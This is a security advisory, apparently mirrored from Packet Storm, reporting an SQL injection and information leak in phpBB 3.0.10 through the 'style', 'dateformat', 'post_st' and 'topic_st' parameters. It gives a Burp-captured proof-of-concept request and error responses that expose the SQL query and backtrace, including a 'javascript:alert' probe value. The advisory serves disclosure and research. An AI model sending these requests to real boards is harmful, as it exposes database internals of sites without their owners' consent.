Search...

phpBB3 SQL Injection

2012-07-28T00:00:00

ID PACKETSTORM:115089
Type packetstorm
Reporter HauntIT
Modified 2012-07-28T00:00:00

Description

                                        
                                            `------------------------------------------------------------------  
Name : phpBB3 SQL Injection  
------------------------------------------------------------------  
Date : 27.07.2012  
------------------------------------------------------------------  
Site : www.phpbb.com  
------------------------------------------------------------------  
Version : 3.0.10  
------------------------------------------------------------------  
  
1) What is it?  
This is very nice forum board. You should try it!  
------------------------------------------------------------------  
2) Type of bug?  
SQL Injection (or SQL-info-Leak if You want).  
------------------------------------------------------------------  
3) Where is the bug?  
Vulnerable parameter seems to be 'style' because if we set up this parameter  
to 'bigger number' (for example: 111111111) we will get an error, with full SQL  
statement.  
  
*updated - dateformat is the second vulnerable parameter!  
*updated - post_st is the 3rd vulnerable parameter!  
*updated - another one: topic_st  
  
  
4) PoC traffic from Burp:  
4.1) Request :  
  
---  
POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174  
Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid=  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 258  
Connection: close  
  
viewemail=1  
&massemail=1  
&allowpm=1  
&hideonline=0  
&notifypm=1  
&popuppm=0  
&lang=en  
&style=%2b1111111111  
&tz=0  
&dst=0  
&dateoptions=D+M+d%2C+Y+g%3Ai+a  
&dateformat=D+M+d%2C+Y+g%3Ai+a  
&submit=Submit  
&creation_time=1343370877  
&form_token=576...  
  
---  
  
4.2) Response:  
  
---  
HTTP/1.1 503 Service Unavailable  
Date: Fri, 27 Jul 2012 06:39:06 GMT  
Server: Apache/2.2.22 (Ubuntu)  
X-Powered-By: PHP/5.3.10-1ubuntu3.2  
Vary: Accept-Encoding  
Connection: close  
Content-Type: text/html  
Content-Length: 2889  
  
  
&lt;!DOCTYPE html PUBLIC "(...)  
  
&lt;a href="./"&gt;Return to the index page&lt;/a&gt; &lt;/div&gt; &lt;div id="acp"&gt; &lt;div class="panel"&gt;  
&lt;div id="content"&gt;  
&lt;h1&gt;General Error&lt;/h1&gt;  
&lt;div&gt;SQL ERROR [ mysqli ]&lt;br /&gt;&lt;br /&gt;Out of range value for column 'user_style' at row 1 [1264]&lt;br /&gt;  
&lt;br /&gt;SQL&lt;br /&gt;&lt;br /&gt;UPDATE phpbb_users  
SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1,   
user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0,   
user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111  
WHERE user_id = 2&lt;br /&gt;  
&lt;br /&gt;BACKTRACE&lt;br /&gt;&lt;div style="font-family: monospace;"&gt;&lt;br /&gt;  
&lt;b&gt;FILE:&lt;/b&gt; [ROOT]/includes/db/mysqli.php&lt;br /&gt;  
&lt;b&gt;LINE:&lt;/b&gt; 182&lt;br /&gt;  
&lt;b&gt;CALL:&lt;/b&gt; dbal-&gt;sql_error()&lt;br /&gt;&lt;br /&gt;  
&lt;b&gt;FILE:&lt;/b&gt; [ROOT]/includes/ucp/ucp_prefs.php  
&lt;br /&gt;&lt;b&gt;LINE:&lt;/b&gt; 100&lt;br /&gt;  
&lt;b&gt;CALL:&lt;/b&gt; dbal_mysqli-&gt;sql_query()&lt;br /&gt;&lt;br /&gt;  
&lt;b&gt;FILE:&lt;/b&gt; [ROOT]/includes/functions_module.php&lt;br /&gt;  
&lt;b&gt;LINE:&lt;/b&gt; 507&lt;br /&gt;  
&lt;b&gt;CALL:&lt;/b&gt; ucp_prefs-&gt;main()&lt;br /&gt;  
&lt;br /&gt;&lt;b&gt;FILE:&lt;/b&gt; [ROOT]/ucp.php&lt;br /&gt;  
&lt;b&gt;LINE:&lt;/b&gt; 333&lt;br /&gt;  
&lt;b&gt;CALL:&lt;/b&gt; p_master-&gt;load_active()&lt;br /&gt;  
&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;  
&lt;p&gt;Please notify the board administrator or webmaster: (...)  
  
---  
  
  
4.2 Other response (this time from post_st parameter):  
---  
&lt;/style&gt;&lt;/head&gt;&lt;body id="errorpage"&gt;&lt;div id="wrap"&gt;   
&lt;div id="page-header"&gt;   
&lt;a href="./"&gt;Return to the index page&lt;/a&gt;   
&lt;/div&gt; &lt;div id="acp"&gt; &lt;div class="panel"&gt;  
&lt;div id="content"&gt;  
&lt;h1&gt;General Error&lt;/h1&gt;  
&lt;div&gt;SQL ERROR [ mysqli ]&lt;br /&gt;&lt;br /&gt;  
Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366]  
&lt;br /&gt;&lt;br /&gt;An SQL error occurred while fetching this page.   
Please contact the &lt;a href="(...)  
---  
  
5) More?  
  
- Ethical hacking for Your company:  
http://hauntit.blogspot.com  
  
- Burp Proxy:  
http://www.portswigger.org   
  
- phBB3 Download:  
http://www.phpbb.com   
  
  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:115089", "type": "packetstorm", "bulletinFamily": "exploit", "title": "phpBB3 SQL Injection", "description": "", "published": "2012-07-28T00:00:00", "modified": "2012-07-28T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/115089/phpBB3-SQL-Injection.html", "reporter": "HauntIT", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:28:51", "viewCount": 28, "enchantments": {"score": {"value": 0.3, "vector": "NONE", "modified": "2016-11-03T10:28:51", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:51", "rev": 2}, "vulnersScore": 0.3}, "sourceHref": "https://packetstormsecurity.com/files/download/115089/27.07.2012-phpBB3-SQL-injection.txt", "sourceData": "`------------------------------------------------------------------ \nName : phpBB3 SQL Injection \n------------------------------------------------------------------ \nDate : 27.07.2012 \n------------------------------------------------------------------ \nSite : www.phpbb.com \n------------------------------------------------------------------ \nVersion : 3.0.10 \n------------------------------------------------------------------ \n \n1) What is it? \nThis is very nice forum board. You should try it! \n------------------------------------------------------------------ \n2) Type of bug? \nSQL Injection (or SQL-info-Leak if You want). \n------------------------------------------------------------------ \n3) Where is the bug? \nVulnerable parameter seems to be 'style' because if we set up this parameter \nto 'bigger number' (for example: 111111111) we will get an error, with full SQL \nstatement. \n \n*updated - dateformat is the second vulnerable parameter! \n*updated - post_st is the 3rd vulnerable parameter! \n*updated - another one: topic_st \n \n \n4) PoC traffic from Burp: \n4.1) Request : \n \n--- \nPOST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-us,en;q=0.5 \nAccept-Encoding: gzip, deflate \nProxy-Connection: keep-alive \nReferer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174 \nCookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid= \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 258 \nConnection: close \n \nviewemail=1 \n&massemail=1 \n&allowpm=1 \n&hideonline=0 \n&notifypm=1 \n&popuppm=0 \n&lang=en \n&style=%2b1111111111 \n&tz=0 \n&dst=0 \n&dateoptions=D+M+d%2C+Y+g%3Ai+a \n&dateformat=D+M+d%2C+Y+g%3Ai+a \n&submit=Submit \n&creation_time=1343370877 \n&form_token=576... \n \n--- \n \n4.2) Response: \n \n--- \nHTTP/1.1 503 Service Unavailable \nDate: Fri, 27 Jul 2012 06:39:06 GMT \nServer: Apache/2.2.22 (Ubuntu) \nX-Powered-By: PHP/5.3.10-1ubuntu3.2 \nVary: Accept-Encoding \nConnection: close \nContent-Type: text/html \nContent-Length: 2889 \n \n \n<!DOCTYPE html PUBLIC \"(...) \n \n<a href=\"./\">Return to the index page</a> </div> <div id=\"acp\"> <div class=\"panel\"> \n<div id=\"content\"> \n<h1>General Error</h1> \n<div>SQL ERROR [ mysqli ]<br /><br />Out of range value for column 'user_style' at row 1 [1264]<br /> \n<br />SQL<br /><br />UPDATE phpbb_users \nSET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1, \nuser_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0, \nuser_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111 \nWHERE user_id = 2<br /> \n<br />BACKTRACE<br /><div style=\"font-family: monospace;\"><br /> \n<b>FILE:</b> [ROOT]/includes/db/mysqli.php<br /> \n<b>LINE:</b> 182<br /> \n<b>CALL:</b> dbal->sql_error()<br /><br /> \n<b>FILE:</b> [ROOT]/includes/ucp/ucp_prefs.php \n<br /><b>LINE:</b> 100<br /> \n<b>CALL:</b> dbal_mysqli->sql_query()<br /><br /> \n<b>FILE:</b> [ROOT]/includes/functions_module.php<br /> \n<b>LINE:</b> 507<br /> \n<b>CALL:</b> ucp_prefs->main()<br /> \n<br /><b>FILE:</b> [ROOT]/ucp.php<br /> \n<b>LINE:</b> 333<br /> \n<b>CALL:</b> p_master->load_active()<br /> \n</div><br /></div> \n<p>Please notify the board administrator or webmaster: (...) \n \n--- \n \n \n4.2 Other response (this time from post_st parameter): \n--- \n</style></head><body id=\"errorpage\"><div id=\"wrap\"> \n<div id=\"page-header\"> \n<a href=\"./\">Return to the index page</a> \n</div> <div id=\"acp\"> <div class=\"panel\"> \n<div id=\"content\"> \n<h1>General Error</h1> \n<div>SQL ERROR [ mysqli ]<br /><br /> \nIncorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366] \n<br /><br />An SQL error occurred while fetching this page. \nPlease contact the <a href=\"(...) \n--- \n \n5) More? \n \n- Ethical hacking for Your company: \nhttp://hauntit.blogspot.com \n \n- Burp Proxy: \nhttp://www.portswigger.org \n \n- phBB3 Download: \nhttp://www.phpbb.com \n \n \n`\n"}